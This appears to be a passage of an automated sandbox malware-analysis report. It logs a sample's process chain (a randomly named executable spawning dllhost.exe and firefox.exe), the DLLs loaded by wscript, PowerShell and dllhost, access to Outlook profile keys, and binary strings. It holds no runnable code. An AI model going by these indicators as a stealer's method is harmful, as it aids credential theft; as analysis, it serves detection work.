Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Process created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 00000005.00000002.2743860674.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2649455449.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2651749861.0000000003067000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, dllhost.exe, 0000000B.00000003.2743752140.0000000003486000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2745671779.000000000363A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: appidtel.pdb source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3413640023.0000000003E0C000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808888776.0000000002FAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3042550015.000000000A11C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: appidtel.exe, 00000005.00000002.2743860674.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2649455449.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2651749861.0000000003067000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2743752140.0000000003486000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2745671779.000000000363A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
